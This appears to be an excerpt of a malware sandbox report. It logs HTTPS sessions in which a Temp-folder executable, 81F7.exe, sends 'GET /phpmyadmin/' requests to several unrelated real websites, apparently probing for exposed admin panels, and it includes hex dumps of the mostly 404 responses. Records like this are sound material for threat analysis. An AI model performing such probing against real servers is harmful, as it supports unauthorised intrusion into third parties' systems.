2024-02-20 23:26:06 UTC	15936	IN	Data Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 Data Ascii: 1dc8<!DOCTYPE html><html lang="de-DE" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This
2024-02-20 23:26:06 UTC	16384	IN	Data Raw: 4b 5a 22 3a 22 4b 61 73 61 63 68 73 74 61 6e 22 2c 22 51 41 22 3a 22 4b 61 74 61 72 22 2c 22 4b 45 22 3a 22 4b 65 6e 69 61 22 2c 22 4b 47 22 3a 22 4b 69 72 67 69 73 69 73 74 61 6e 22 2c 22 4b 49 22 3a 22 4b 69 72 69 62 61 74 69 22 2c 22 55 4d 22 3a 22 4b 6c 65 69 6e 65 72 65 20 49 6e 73 65 6c 62 65 73 69 74 7a 75 6e 67 65 6e 20 64 65 72 20 56 65 72 65 69 6e 69 67 74 65 6e 20 53 74 61 61 74 65 6e 22 2c 22 43 43 22 3a 22 4b 6f 6b 6f 73 69 6e 73 65 6c 6e 22 2c 22 43 4f 22 3a 22 4b 6f 6c 75 6d 62 69 65 6e 22 2c 22 4b 4d 22 3a 22 4b 6f 6d 6f 72 65 6e 22 2c 22 43 47 22 3a 22 4b 6f 6e 67 6f 22 2c 22 43 44 22 3a 22 4b 6f 6e 67 6f 2c 20 44 65 6d 6f 6b 72 61 74 69 73 63 68 65 20 52 65 70 75 62 6c 69 6b 22 2c 22 4b 52 22 3a 22 4b 6f 72 65 61 22 2c 22 48 52 22 3a 22 Data Ascii: KZ":"Kasachstan","QA":"Katar","KE":"Kenia","KG":"Kirgisistan","KI":"Kiribati","UM":"Kleinere Inselbesitzungen der Vereinigten Staaten","CC":"Kokosinseln","CO":"Kolumbien","KM":"Komoren","CG":"Kongo","CD":"Kongo, Demokratische Republik","KR":"Korea","HR":"
2024-02-20 23:26:06 UTC	15044	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d Data Ascii: ransform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	52253	217.26.61.200	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Set-Cookie: PHPSESSID=9igri8h3d2ih2b7lfdbago2oq9rdlupc; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:06 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:06 UTC	464	IN	Data Raw: 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 Data Ascii: lock-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8
2024-02-20 23:26:06 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:06 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f Data Ascii: 2000ng-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-blo
2024-02-20 23:26:06 UTC	6	IN	Data Raw: 61 79 2d 62 6f 72 Data Ascii: ay-bor
2024-02-20 23:26:06 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:06 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 Data Ascii: 2000der-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important
2024-02-20 23:26:06 UTC	6	IN	Data Raw: 61 6c 2d 63 6f 6c Data Ascii: al-col
2024-02-20 23:26:06 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:06 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 Data Ascii: 2000or-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	51917	144.91.85.110	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:05 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	52244	178.33.253.225	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:06 UTC	16040	IN	Data Raw: 31 65 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 26 23 38 32 31 31 3b 20 43 46 43 41 20 26 23 38 32 31 31 3b 20 43 61 62 69 6e 65 74 20 64 26 23 30 Data Ascii: 1ec3<!doctype html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page non trouve – CFCA – Cabinet d&#0
2024-02-20 23:26:06 UTC	16384	IN	Data Raw: 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 65 69 63 6f 6e 73 2f 63 73 73 2f 65 6c 65 0d 0a 32 30 30 30 0d 0a 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 32 37 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 66 63 61 2e 65 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 39 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c Data Ascii: ugins/elementor/assets/lib/eicons/css/ele2000mentor-icons.min.css?ver=5.27.0' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://cfca.eu/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.19.2' media='all' /><
2024-02-20 23:26:06 UTC	16384	IN	Data Raw: 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 0d 0a 31 30 30 30 0d 0a 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 73 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 67 34 51 49 46 71 50 66 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 Data Ascii: ce { font-family: 'Raleway'; font-style: italic; fo1000nt-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptsg8zYS_SKggPNyCg4QIFqPfE.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4
2024-02-20 23:26:06 UTC	14797	IN	Data Raw: 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 6b 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 Data Ascii: }/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptug8zYS_SKggPNyCkIT5lu.woff2) format('woff2'); unicode-range: U+0301, U+0400-04

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	51868	162.215.240.240	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	381	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:05 UTC	7811	IN	Data Raw: 33 64 63 39 0d 0a 3c 21 2d 2d 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 76 69 65 77 70 6f 72 74 22 3e 2d 2d 3e 0a 3c 21 2d 2d 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 2d 2d 3e 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c Data Ascii: 3dc9...<section class="viewport">-->... <div id="scroll-container" class="scroll-container">--><!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel
2024-02-20 23:26:05 UTC	8012	IN	Data Raw: 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a Data Ascii: ,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-siz
2024-02-20 23:26:05 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:05 UTC	8192	IN	Data Raw: 32 36 33 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 65 66 74 74 65 63 68 6e 6f 6c 6f 67 69 65 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 37 2e 35 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 62 63 70 66 2d 69 6e 74 6c 54 65 6c 49 6e 70 75 74 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 65 66 74 74 65 63 68 6e 6f Data Ascii: 2638<link rel='stylesheet' id='contact-form-7-css' href='https://wefttechnologies.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /><link rel='stylesheet' id='nbcpf-intlTelInput-style-css' href='https://wefttechno
2024-02-20 23:26:05 UTC	1598	IN	Data Raw: 34 20 36 2e 38 32 31 30 34 20 31 30 31 2e 37 33 20 36 2e 39 39 36 30 39 56 31 2e 32 31 33 34 33 43 31 30 30 2e 39 30 39 20 30 2e 39 33 31 37 30 36 20 31 30 30 2e 30 37 32 20 30 2e 37 30 33 37 31 36 20 39 39 2e 32 32 31 36 20 30 2e 35 33 30 39 30 34 43 39 38 2e 30 34 37 38 20 30 2e 33 30 38 35 30 37 20 39 36 2e 38 35 35 32 20 30 2e 32 30 30 35 30 34 20 39 35 2e 36 36 30 35 20 30 2e 32 30 38 34 31 33 43 39 33 2e 38 38 39 35 20 30 2e 32 30 34 37 39 20 39 32 2e 31 33 37 38 20 30 2e 35 37 36 39 39 38 20 39 30 2e 35 32 31 32 20 31 2e 33 30 30 34 35 43 38 38 2e 39 37 35 39 20 32 2e 30 30 33 34 33 20 38 37 2e 36 37 38 34 20 33 2e 31 35 35 38 31 20 38 36 2e 37 39 38 20 34 2e 36 30 37 32 37 43 38 35 2e 38 30 32 36 20 36 2e 32 36 35 35 33 20 38 35 2e 33 31 30 36 20 Data Ascii: 4 6.82104 101.73 6.99609V1.21343C100.909 0.931706 100.072 0.703716 99.2216 0.530904C98.0478 0.308507 96.8552 0.200504 95.6605 0.208413C93.8895 0.20479 92.1378 0.576998 90.5212 1.30045C88.9759 2.00343 87.6784 3.15581 86.798 4.60727C85.8026 6.26553 85.3106
2024-02-20 23:26:05 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
